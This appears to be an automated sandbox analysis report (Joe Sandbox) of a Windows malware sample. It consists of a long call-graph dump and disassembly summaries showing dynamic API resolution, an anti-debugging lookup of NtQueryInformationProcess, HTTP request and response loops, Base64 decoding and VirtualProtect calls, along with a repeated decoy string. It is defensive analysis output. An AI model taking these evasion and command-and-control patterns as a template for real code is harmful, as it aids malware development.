703672 38561->38562 38563 704610 2 API calls 38562->38563 38564 70368b 38563->38564 38565 704610 2 API calls 38564->38565 38566 7036a4 38565->38566 38567 704610 2 API calls 38566->38567 38568 7036bd 38567->38568 38569 704610 2 API calls 38568->38569 38570 7036d6 38569->38570 38571 704610 2 API calls 38570->38571 38572 7036ef 38571->38572 38573 704610 2 API calls 38572->38573 38574 703708 38573->38574 38575 704610 2 API calls 38574->38575 38576 703721 38575->38576 38577 704610 2 API calls 38576->38577 38578 70373a 38577->38578 38579 704610 2 API calls 38578->38579 38580 703753 38579->38580 38581 704610 2 API calls 38580->38581 38582 70376c 38581->38582 38583 704610 2 API calls 38582->38583 38584 703785 38583->38584 38585 704610 2 API calls 38584->38585 38586 70379e 38585->38586 38587 704610 2 API calls 38586->38587 38588 7037b7 38587->38588 38589 704610 2 API calls 38588->38589 38590 7037d0 38589->38590 38591 704610 2 API calls 38590->38591 38592 7037e9 38591->38592 38593 704610 2 API calls 38592->38593 38594 703802 38593->38594 38595 704610 2 API calls 38594->38595 38596 70381b 38595->38596 38597 704610 2 API calls 38596->38597 38598 703834 38597->38598 38599 704610 2 API calls 38598->38599 38600 70384d 38599->38600 38601 704610 2 API calls 38600->38601 38602 703866 38601->38602 38603 704610 2 API calls 38602->38603 38604 70387f 38603->38604 38605 704610 2 API calls 38604->38605 38606 703898 38605->38606 38607 704610 2 API calls 38606->38607 38608 7038b1 38607->38608 38609 704610 2 API calls 38608->38609 38610 7038ca 38609->38610 38611 704610 2 API calls 38610->38611 38612 7038e3 38611->38612 38613 704610 2 API calls 38612->38613 38614 7038fc 38613->38614 38615 704610 2 API calls 38614->38615 38616 703915 38615->38616 38617 704610 2 API calls 38616->38617 38618 70392e 38617->38618 38619 704610 2 API calls 38618->38619 38620 703947 38619->38620 38621 704610 2 API calls 38620->38621 38622 703960 38621->38622 38623 704610 2 API calls 38622->38623 38624 703979 38623->38624 38625 704610 2 API calls 38624->38625 38626 703992 38625->38626 38627 704610 2 API calls 38626->38627 38628 7039ab 38627->38628 38629 704610 2 API calls 38628->38629 38630 7039c4 38629->38630 38631 704610 2 API calls 38630->38631 38632 7039dd 38631->38632 38633 704610 2 API calls 38632->38633 38634 7039f6 38633->38634 38635 704610 2 API calls 38634->38635 38636 703a0f 38635->38636 38637 704610 2 API calls 38636->38637 38638 703a28 38637->38638 38639 704610 2 API calls 38638->38639 38640 703a41 38639->38640 38641 704610 2 API calls 38640->38641 38642 703a5a 38641->38642 38643 704610 2 API calls 38642->38643 38644 703a73 38643->38644 38645 704610 2 API calls 38644->38645 38646 703a8c 38645->38646 38647 704610 2 API calls 38646->38647 38648 703aa5 38647->38648 38649 704610 2 API calls 38648->38649 38650 703abe 38649->38650 38651 704610 2 API calls 38650->38651 38652 703ad7 38651->38652 38653 704610 2 API calls 38652->38653 38654 703af0 38653->38654 38655 704610 2 API calls 38654->38655 38656 703b09 38655->38656 38657 704610 2 API calls 38656->38657 38658 703b22 38657->38658 38659 704610 2 API calls 38658->38659 38660 703b3b 38659->38660 38661 704610 2 API calls 38660->38661 38662 703b54 38661->38662 38663 704610 2 API calls 38662->38663 38664 703b6d 38663->38664 38665 704610 2 API calls 38664->38665 38666 703b86 38665->38666 38667 704610 2 API calls 38666->38667 38668 703b9f 38667->38668 38669 704610 2 API calls 38668->38669 38670 703bb8 38669->38670 38671 704610 2 API calls 38670->38671 38672 703bd1 38671->38672 38673 704610 2 API calls 38672->38673 38674 703bea 38673->38674 38675 704610 2 API calls 38674->38675 38676 703c03 38675->38676 38677 704610 2 API calls 38676->38677 38678 703c1c 38677->38678 38679 704610 2 API calls 38678->38679 38680 703c35 38679->38680 38681 704610 2 API calls 38680->38681 38682 703c4e 38681->38682 38683 704610 2 API calls 38682->38683 38684 703c67 38683->38684 38685 704610 2 API calls 38684->38685 38686 703c80 38685->38686 38687 704610 2 API calls 38686->38687 38688 703c99 38687->38688 38689 704610 2 API calls 38688->38689 38690 703cb2 38689->38690 38691 704610 2 API calls 38690->38691 38692 703ccb 38691->38692 38693 704610 2 API calls 38692->38693 38694 703ce4 38693->38694 38695 704610 2 API calls 38694->38695 38696 703cfd 38695->38696 38697 704610 2 API calls 38696->38697 38698 703d16 38697->38698 38699 704610 2 API calls 38698->38699 38700 703d2f 38699->38700 38701 704610 2 API calls 38700->38701 38702 703d48 38701->38702 38703 704610 2 API calls 38702->38703 38704 703d61 38703->38704 38705 704610 2 API calls 38704->38705 38706 703d7a 38705->38706 38707 704610 2 API calls 38706->38707 38708 703d93 38707->38708 38709 704610 2 API calls 38708->38709 38710 703dac 38709->38710 38711 704610 2 API calls 38710->38711 38712 703dc5 38711->38712 38713 704610 2 API calls 38712->38713 38714 703dde 38713->38714 38715 704610 2 API calls 38714->38715 38716 703df7 38715->38716 38717 704610 2 API calls 38716->38717 38718 703e10 38717->38718 38719 704610 2 API calls 38718->38719 38720 703e29 38719->38720 38721 704610 2 API calls 38720->38721 38722 703e42 38721->38722 38723 704610 2 API calls 38722->38723 38724 703e5b 38723->38724 38725 704610 2 API calls 38724->38725 38726 703e74 38725->38726 38727 704610 2 API calls 38726->38727 38728 703e8d 38727->38728 38729 704610 2 API calls 38728->38729 38730 703ea6 38729->38730 38731 704610 2 API calls 38730->38731 38732 703ebf 38731->38732 38733 704610 2 API calls 38732->38733 38734 703ed8 38733->38734 38735 704610 2 API calls 38734->38735 38736 703ef1 38735->38736 38737 704610 2 API calls 38736->38737 38738 703f0a 38737->38738 38739 704610 2 API calls 38738->38739 38740 703f23 38739->38740 38741 704610 2 API calls 38740->38741 38742 703f3c 38741->38742 38743 704610 2 API calls 38742->38743 38744 703f55 38743->38744 38745 704610 2 API calls 38744->38745 38746 703f6e 38745->38746 38747 704610 2 API calls 38746->38747 38748 703f87 38747->38748 38749 704610 2 API calls 38748->38749 38750 703fa0 38749->38750 38751 704610 2 API calls 38750->38751 38752 703fb9 38751->38752 38753 704610 2 API calls 38752->38753 38754 703fd2 38753->38754 38755 704610 2 API calls 38754->38755 38756 703feb 38755->38756 38757 704610 2 API calls 38756->38757 38758 704004 38757->38758 38759 704610 2 API calls 38758->38759 38760 70401d 38759->38760 38761 704610 2 API calls 38760->38761 38762 704036 38761->38762 38763 704610 2 API calls 38762->38763 38764 70404f 38763->38764 38765 704610 2 API calls 38764->38765 38766 704068 38765->38766 38767 704610 2 API calls 38766->38767 38768 704081 38767->38768 38769 704610 2 API calls 38768->38769 38770 70409a 38769->38770 38771 704610 2 API calls 38770->38771 38772 7040b3 38771->38772 38773 704610 2 API calls 38772->38773 38774 7040cc 38773->38774 38775 704610 2 API calls 38774->38775 38776 7040e5 38775->38776 38777 704610 2 API calls 38776->38777 38778 7040fe 38777->38778 38779 704610 2 API calls 38778->38779 38780 704117 38779->38780 38781 704610 2 API calls 38780->38781 38782 704130 38781->38782 38783 704610 2 API calls 38782->38783 38784 704149 38783->38784 38785 704610 2 API calls 38784->38785 38786 704162 38785->38786 38787 704610 2 API calls 38786->38787 38788 70417b 38787->38788 38789 704610 2 API calls 38788->38789 38790 704194 38789->38790 38791 704610 2 API calls 38790->38791 38792 7041ad 38791->38792 38793 704610 2 API calls 38792->38793 38794 7041c6 38793->38794 38795 704610 2 API calls 38794->38795 38796 7041df 38795->38796 38797 704610 2 API calls 38796->38797 38798 7041f8 38797->38798 38799 704610 2 API calls 38798->38799 38800 704211 38799->38800 38801 704610 2 API calls 38800->38801 38802 70422a 38801->38802 38803 704610 2 API calls 38802->38803 38804 704243 38803->38804 38805 704610 2 API calls 38804->38805 38806 70425c 38805->38806 38807 704610 2 API calls 38806->38807 38808 704275 38807->38808 38809 704610 2 API calls 38808->38809 38810 70428e 38809->38810 38811 704610 2 API calls 38810->38811 38812 7042a7 38811->38812 38813 704610 2 API calls 38812->38813 38814 7042c0 38813->38814 38815 704610 2 API calls 38814->38815 38816 7042d9 38815->38816 38817 704610 2 API calls 38816->38817 38818 7042f2 38817->38818 38819 704610 2 API calls 38818->38819 38820 70430b 38819->38820 38821 704610 2 API calls 38820->38821 38822 704324 38821->38822 38823 704610 2 API calls 38822->38823 38824 70433d 38823->38824 38825 704610 2 API calls 38824->38825 38826 704356 38825->38826 38827 704610 2 API calls 38826->38827 38828 70436f 38827->38828 38829 704610 2 API calls 38828->38829 38830 704388 38829->38830 38831 704610 2 API calls 38830->38831 38832 7043a1 38831->38832 38833 704610 2 API calls 38832->38833 38834 7043ba 38833->38834 38835 704610 2 API calls 38834->38835 38836 7043d3 38835->38836 38837 704610 2 API calls 38836->38837 38838 7043ec 38837->38838 38839 704610 2 API calls 38838->38839 38840 704405 38839->38840 38841 704610 2 API calls 38840->38841 38842 70441e 38841->38842 38843 704610 2 API calls 38842->38843 38844 704437 38843->38844 38845 704610 2 API calls 38844->38845 38846 704450 38845->38846 38847 704610 2 API calls 38846->38847 38848 704469 38847->38848 38849 704610 2 API calls 38848->38849 38850 704482 38849->38850 38851 704610 2 API calls 38850->38851 38852 70449b 38851->38852 38853 704610 2 API calls 38852->38853 38854 7044b4 38853->38854 38855 704610 2 API calls 38854->38855 38856 7044cd 38855->38856 38857 704610 2 API calls 38856->38857 38858 7044e6 38857->38858 38859 704610 2 API calls 38858->38859 38860 7044ff 38859->38860 38861 704610 2 API calls 38860->38861 38862 704518 38861->38862 38863 704610 2 API calls 38862->38863 38864 704531 38863->38864 38865 704610 2 API calls 38864->38865 38866 70454a 38865->38866 38867 704610 2 API calls 38866->38867 38868 704563 38867->38868 38869 704610 2 API calls 38868->38869 38870 70457c 38869->38870 38871 704610 2 API calls 38870->38871 38872 704595 38871->38872 38873 704610 2 API calls 38872->38873 38874 7045ae 38873->38874 38875 704610 2 API calls 38874->38875 38876 7045c7 38875->38876 38877 704610 2 API calls 38876->38877 38878 7045e0 38877->38878 38879 704610 2 API calls 38878->38879 38880 7045f9 38879->38880 38881 719f20 38880->38881 38882 719f30 43 API calls 38881->38882 38883 71a346 8 API calls 38881->38883 38882->38883 38884 71a456 38883->38884 38885 71a3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38883->38885 38886 71a463 8 API calls 38884->38886 38887 71a526 38884->38887 38885->38884 38886->38887 38888 71a5a8 38887->38888 38889 71a52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38887->38889 38890 71a5b5 6 API calls 38888->38890 38891 71a647 38888->38891 38889->38888 38890->38891 38892 71a654 9 API calls 38891->38892 38893 71a72f 38891->38893 38892->38893 38894 71a7b2 38893->38894 38895 71a738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38893->38895 38896 71a7bb GetProcAddress GetProcAddress 38894->38896 38897 71a7ec 38894->38897 38895->38894 38896->38897 38898 71a825 38897->38898 38899 71a7f5 GetProcAddress GetProcAddress 38897->38899 38900 71a922 38898->38900 38901 71a832 10 API calls 38898->38901 38899->38898 38902 71a92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38900->38902 38903 71a98d 38900->38903 38901->38900 38902->38903 38904 71a996 GetProcAddress 38903->38904 38905 71a9ae 38903->38905 38904->38905 38906 71a9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38905->38906 38907 715ef3 38905->38907 38906->38907 38908 701590 38907->38908 39178 7016b0 38908->39178 38911 71aab0 lstrcpy 38912 7015b5 38911->38912 38913 71aab0 lstrcpy 38912->38913 38914 7015c7 38913->38914 38915 71aab0 lstrcpy 38914->38915 38916 7015d9 38915->38916 38917 71aab0 lstrcpy 38916->38917 38918 701663 38917->38918 38919 715760 38918->38919 38920 715771 38919->38920 38921 71ab30 2 API calls 38920->38921 38922 71577e 38921->38922 38923 71ab30 2 API calls 38922->38923 38924 71578b 38923->38924 38925 71ab30 2 API calls 38924->38925 38926 715798 38925->38926 38927 71aa50 lstrcpy 38926->38927 38928 7157a5 38927->38928 38929 71aa50 lstrcpy 38928->38929 38930 7157b2 38929->38930 38931 71aa50 lstrcpy 38930->38931 38932 7157bf 38931->38932 38933 71aa50 lstrcpy 38932->38933 38971 7157cc 38933->38971 38934 701590 lstrcpy 38934->38971 38935 715510 25 API calls 38935->38971 38936 715893 StrCmpCA 38936->38971 38937 7158f0 StrCmpCA 38938 715a2c 38937->38938 38937->38971 38939 71abb0 lstrcpy 38938->38939 38940 715a38 38939->38940 38941 71ab30 2 API calls 38940->38941 38942 715a46 38941->38942 38944 71ab30 2 API calls 38942->38944 38943 715aa6 StrCmpCA 38945 715be1 38943->38945 38943->38971 38949 715a55 38944->38949 38948 71abb0 lstrcpy 38945->38948 38946 71aa50 lstrcpy 38946->38971 38947 71abb0 lstrcpy 38947->38971 38950 715bed 38948->38950 38951 7016b0 lstrcpy 38949->38951 38953 71ab30 2 API calls 38950->38953 38970 715a61 38951->38970 38952 71ab30 lstrlen lstrcpy 38952->38971 38954 715bfb 38953->38954 38957 71ab30 2 API calls 38954->38957 38955 715c5b StrCmpCA 38958 715c66 Sleep 38955->38958 38959 715c78 38955->38959 38956 71aab0 lstrcpy 38956->38971 38961 715c0a 38957->38961 38958->38971 38960 71abb0 lstrcpy 38959->38960 38962 715c84 38960->38962 38963 7016b0 lstrcpy 38961->38963 38964 71ab30 2 API calls 38962->38964 38963->38970 38965 715c93 38964->38965 38966 71ab30 2 API calls 38965->38966 38967 715ca2 38966->38967 38969 7016b0 lstrcpy 38967->38969 38968 7159da StrCmpCA 38968->38971 38969->38970 38970->38026 38971->38934 38971->38935 38971->38936 38971->38937 38971->38943 38971->38946 38971->38947 38971->38952 38971->38955 38971->38956 38971->38968 38972 715b8f StrCmpCA 38971->38972 38973 715440 20 API calls 38971->38973 38972->38971 38973->38971 38975 7176e3 GetVolumeInformationA 38974->38975 38976 7176dc 38974->38976 38977 717721 38975->38977 38976->38975 38978 71778c GetProcessHeap RtlAllocateHeap 38977->38978 38979 7177a9 38978->38979 38980 7177b8 wsprintfA 38978->38980 38981 71aa50 lstrcpy 38979->38981 38982 71aa50 lstrcpy 38980->38982 38983 715ff7 38981->38983 38982->38983 38983->38047 38985 71aab0 lstrcpy 38984->38985 38986 7048e9 38985->38986 39187 704800 38986->39187 38988 7048f5 38989 71aa50 lstrcpy 38988->38989 38990 704927 38989->38990 38991 71aa50 lstrcpy 38990->38991 38992 704934 38991->38992 38993 71aa50 lstrcpy 38992->38993 38994 704941 38993->38994 38995 71aa50 lstrcpy 38994->38995 38996 70494e 38995->38996 38997 71aa50 lstrcpy 38996->38997 38998 70495b InternetOpenA StrCmpCA 38997->38998 38999 704994 38998->38999 39000 704f1b InternetCloseHandle 38999->39000 39193 718cf0 38999->39193 39002 704f38 39000->39002 39208 70a210 CryptStringToBinaryA 39002->39208 39003 7049b3 39201 71ac30 39003->39201 39007 7049c6 39008 71abb0 lstrcpy 39007->39008 39013 7049cf 39008->39013 39009 71ab30 2 API calls 39010 704f55 39009->39010 39011 71acc0 4 API calls 39010->39011 39014 704f6b 39011->39014 39012 704f77 ctype 39016 71aab0 lstrcpy 39012->39016 39017 71acc0 4 API calls 39013->39017 39015 71abb0 lstrcpy 39014->39015 39015->39012 39029 704fa7 39016->39029 39018 7049f9 39017->39018 39019 71abb0 lstrcpy 39018->39019 39020 704a02 39019->39020 39021 71acc0 4 API calls 39020->39021 39022 704a21 39021->39022 39023 71abb0 lstrcpy 39022->39023 39024 704a2a 39023->39024 39025 71ac30 3 API calls 39024->39025 39026 704a48 39025->39026 39027 71abb0 lstrcpy 39026->39027 39028 704a51 39027->39028 39030 71acc0 4 API calls 39028->39030 39029->38050 39031 704a70 39030->39031 39032 71abb0 lstrcpy 39031->39032 39033 704a79 39032->39033 39034 71acc0 4 API calls 39033->39034 39035 704a98 39034->39035 39036 71abb0 lstrcpy 39035->39036 39037 704aa1 39036->39037 39038 71acc0 4 API calls 39037->39038 39039 704acd 39038->39039 39040 71ac30 3 API calls 39039->39040 39041 704ad4 39040->39041 39042 71abb0 lstrcpy 39041->39042 39043 704add 39042->39043 39044 704af3 InternetConnectA 39043->39044 39044->39000 39045 704b23 HttpOpenRequestA 39044->39045 39047 704b78 39045->39047 39048 704f0e InternetCloseHandle 39045->39048 39049 71acc0 4 API calls 39047->39049 39048->39000 39050 704b8c 39049->39050 39051 71abb0 lstrcpy 39050->39051 39052 704b95 39051->39052 39053 71ac30 3 API calls 39052->39053 39054 704bb3 39053->39054 39055 71abb0 lstrcpy 39054->39055 39056 704bbc 39055->39056 39057 71acc0 4 API calls 39056->39057 39058 704bdb 39057->39058 39059 71abb0 lstrcpy 39058->39059 39060 704be4 39059->39060 39061 71acc0 4 API calls 39060->39061 39062 704c05 39061->39062 39063 71abb0 lstrcpy 39062->39063 39064 704c0e 39063->39064 39065 71acc0 4 API calls 39064->39065 39066 704c2e 39065->39066 39067 71abb0 lstrcpy 39066->39067 39068 704c37 39067->39068 39069 71acc0 4 API calls 39068->39069 39070 704c56 39069->39070 39071 71abb0 lstrcpy 39070->39071 39072 704c5f 39071->39072 39073 71ac30 3 API calls 39072->39073 39074 704c7d 39073->39074 39075 71abb0 lstrcpy 39074->39075 39076 704c86 39075->39076 39077 71acc0 4 API calls 39076->39077 39078 704ca5 39077->39078 39079 71abb0 lstrcpy 39078->39079 39080 704cae 39079->39080 39081 71acc0 4 API calls 39080->39081 39082 704ccd 39081->39082 39083 71abb0 lstrcpy 39082->39083 39084 704cd6 39083->39084 39085 71ac30 3 API calls 39084->39085 39086 704cf4 39085->39086 39087 71abb0 lstrcpy 39086->39087 39088 704cfd 39087->39088 39089 71acc0 4 API calls 39088->39089 39090 704d1c 39089->39090 39091 71abb0 lstrcpy 39090->39091 39092 704d25 39091->39092 39093 71acc0 4 API calls 39092->39093 39094 704d46 39093->39094 39095 71abb0 lstrcpy 39094->39095 39096 704d4f 39095->39096 39097 71acc0 4 API calls 39096->39097 39098 704d6f 39097->39098 39099 71abb0 lstrcpy 39098->39099 39100 704d78 39099->39100 39101 71acc0 4 API calls 39100->39101 39102 704d97 39101->39102 39103 71abb0 lstrcpy 39102->39103 39104 704da0 39103->39104 39105 71ac30 3 API calls 39104->39105 39106 704dbe 39105->39106 39107 71abb0 lstrcpy 39106->39107 39108 704dc7 39107->39108 39109 71aa50 lstrcpy 39108->39109 39110 704de2 39109->39110 39111 71ac30 3 API calls 39110->39111 39112 704e03 39111->39112 39113 71ac30 3 API calls 39112->39113 39114 704e0a 39113->39114 39115 71abb0 lstrcpy 39114->39115 39116 704e16 39115->39116 39117 704e37 lstrlen 39116->39117 39118 704e4a 39117->39118 39119 704e53 lstrlen 39118->39119 39207 71ade0 39119->39207 39121 704e63 HttpSendRequestA 39122 704e82 InternetReadFile 39121->39122 39123 704eb7 InternetCloseHandle 39122->39123 39124 704eae 39122->39124 39127 71ab10 39123->39127 39124->39122 39124->39123 39126 71acc0 4 API calls 39124->39126 39128 71abb0 lstrcpy 39124->39128 39126->39124 39127->39048 39128->39124 39214 71ade0 39129->39214 39131 711a14 StrCmpCA 39132 711a1f ExitProcess 39131->39132 39144 711a27 39131->39144 39133 711c12 39133->38052 39134 711afd StrCmpCA 39134->39144 39135 711b1f StrCmpCA 39135->39144 39136 711b41 StrCmpCA 39136->39144 39137 711ba1 StrCmpCA 39137->39144 39138 711bc0 StrCmpCA 39138->39144 39139 711b63 StrCmpCA 39139->39144 39140 711b82 StrCmpCA 39140->39144 39141 711aad StrCmpCA 39141->39144 39142 711acf StrCmpCA 39142->39144 39143 71ab30 lstrlen lstrcpy 39143->39144 39144->39133 39144->39134 39144->39135 39144->39136 39144->39137 39144->39138 39144->39139 39144->39140 39144->39141 39144->39142 39144->39143 39145->38058 39146->38060 39147->38066 39148->38068 39149->38074 39150->38076 39151->38080 39152->38084 39153->38088 39154->38094 39155->38096 39156->38100 39157->38113 39158->38118 39159->38117 39160->38114 39161->38117 39162->38134 39163->38120 39164->38124 39165->38125 39166->38130 39167->38136 39168->38138 39169->38145 39170->38147 39171->38171 39172->38175 39173->38174 39174->38170 39175->38174 39176->38184 39179 71aab0 lstrcpy 39178->39179 39180 7016c3 39179->39180 39181 71aab0 lstrcpy 39180->39181 39182 7016d5 39181->39182 39183 71aab0 lstrcpy 39182->39183 39184 7016e7 39183->39184 39185 71aab0 lstrcpy 39184->39185 39186 7015a3 39185->39186 39186->38911 39188 704816 39187->39188 39189 704888 lstrlen 39188->39189 39213 71ade0 39189->39213 39191 704898 InternetCrackUrlA 39192 7048b7 39191->39192 39192->38988 39194 71aa50 lstrcpy 39193->39194 39195 718d04 39194->39195 39196 71aa50 lstrcpy 39195->39196 39197 718d12 GetSystemTime 39196->39197 39199 718d29 39197->39199 39198 71aab0 lstrcpy 39200 718d8c 39198->39200 39199->39198 39200->39003 39202 71ac41 39201->39202 39203 71ac98 39202->39203 39205 71ac78 lstrcpy lstrcat 39202->39205 39204 71aab0 lstrcpy 39203->39204 39206 71aca4 39204->39206 39205->39203 39206->39007 39207->39121 39209 70a249 LocalAlloc 39208->39209 39210 704f3e 39208->39210 39209->39210 39211 70a264 CryptStringToBinaryA 39209->39211 39210->39009 39210->39012 39211->39210 39212 70a289 LocalFree 39211->39212 39212->39210 39213->39191 39214->39131 39215 c48896 39216 c48921 VirtualProtect 39215->39216 39218 c493e5 39216->39218

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 660 719bb0-719bc4 call 719aa0 663 719de3-719e42 LoadLibraryA * 5 660->663 664 719bca-719dde call 719ad0 GetProcAddress * 21 660->664 666 719e44-719e58 GetProcAddress 663->666 667 719e5d-719e64 663->667 664->663 666->667 669 719e96-719e9d 667->669 670 719e66-719e91 GetProcAddress * 2 667->670 671 719eb8-719ebf 669->671 672 719e9f-719eb3 GetProcAddress 669->672 670->669 673 719ec1-719ed4 GetProcAddress 671->673 674 719ed9-719ee0 671->674 672->671 673->674 675 719f11-719f12 674->675 676 719ee2-719f0c GetProcAddress * 2 674->676 676->675
                                  APIs
                                  • GetProcAddress.KERNEL32(75900000,011D0E18), ref: 00719BF1
                                  • GetProcAddress.KERNEL32(75900000,011D0D10), ref: 00719C0A
                                  • GetProcAddress.KERNEL32(75900000,011D0E30), ref: 00719C22
                                  • GetProcAddress.KERNEL32(75900000,011D0ED8), ref: 00719C3A
                                  • GetProcAddress.KERNEL32(75900000,011D0D28), ref: 00719C53
                                  • GetProcAddress.KERNEL32(75900000,011D9160), ref: 00719C6B
                                  • GetProcAddress.KERNEL32(75900000,011C5320), ref: 00719C83
                                  • GetProcAddress.KERNEL32(75900000,011C5480), ref: 00719C9C
                                  • GetProcAddress.KERNEL32(75900000,011D0D40), ref: 00719CB4
                                  • GetProcAddress.KERNEL32(75900000,011D0DA0), ref: 00719CCC
                                  • GetProcAddress.KERNEL32(75900000,011D0EC0), ref: 00719CE5
                                  • GetProcAddress.KERNEL32(75900000,011D0F38), ref: 00719CFD
                                  • GetProcAddress.KERNEL32(75900000,011C5340), ref: 00719D15
                                  • GetProcAddress.KERNEL32(75900000,011D0DB8), ref: 00719D2E
                                  • GetProcAddress.KERNEL32(75900000,011D0DE8), ref: 00719D46
                                  • GetProcAddress.KERNEL32(75900000,011C54A0), ref: 00719D5E
                                  • GetProcAddress.KERNEL32(75900000,011D0E48), ref: 00719D77
                                  • GetProcAddress.KERNEL32(75900000,011D0FF8), ref: 00719D8F
                                  • GetProcAddress.KERNEL32(75900000,011C54E0), ref: 00719DA7
                                  • GetProcAddress.KERNEL32(75900000,011D0F68), ref: 00719DC0
                                  • GetProcAddress.KERNEL32(75900000,011C5360), ref: 00719DD8
                                  • LoadLibraryA.KERNEL32(011D1028,?,00716CA0), ref: 00719DEA
                                  • LoadLibraryA.KERNEL32(011D0F80,?,00716CA0), ref: 00719DFB
                                  • LoadLibraryA.KERNEL32(011D0FE0,?,00716CA0), ref: 00719E0D
                                  • LoadLibraryA.KERNEL32(011D1010,?,00716CA0), ref: 00719E1F
                                  • LoadLibraryA.KERNEL32(011D0F98,?,00716CA0), ref: 00719E30
                                  • GetProcAddress.KERNEL32(75070000,011D0FB0), ref: 00719E52
                                  • GetProcAddress.KERNEL32(75FD0000,011D0FC8), ref: 00719E73
                                  • GetProcAddress.KERNEL32(75FD0000,011D93C8), ref: 00719E8B
                                  • GetProcAddress.KERNEL32(75A50000,011D9440), ref: 00719EAD
                                  • GetProcAddress.KERNEL32(74E50000,011C52A0), ref: 00719ECE
                                  • GetProcAddress.KERNEL32(76E80000,011D9220), ref: 00719EEF
                                  • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00719F06
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 00719EFA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: 8b6233f69813404545da94bea2c4bf37b60529650eb69e4df7ee5b1035ccabf4
                                  • Instruction ID: 89210d254c815b762648eaf3b90ba9246a718e01c74ac5ab6a3645a8f8049d5f
                                  • Opcode Fuzzy Hash: 8b6233f69813404545da94bea2c4bf37b60529650eb69e4df7ee5b1035ccabf4
                                  • Instruction Fuzzy Hash: 45A13DB65BE2509FC344DFE8FC88956BBA9A74D301710861BBA19C3274E734A5C0EF60

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 764 704610-7046e5 RtlAllocateHeap 781 7046f0-7046f6 764->781 782 7046fc-70479a 781->782 783 70479f-7047f9 VirtualProtect 781->783 782->781
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0070465F
                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 007047EC
                                  Strings
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00704638
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00704672
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007047C0
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00704784
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0070467D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007047AA
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007046A7
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00704712
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007047CB
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0070476E
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007046FC
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00704763
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007046B2
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00704688
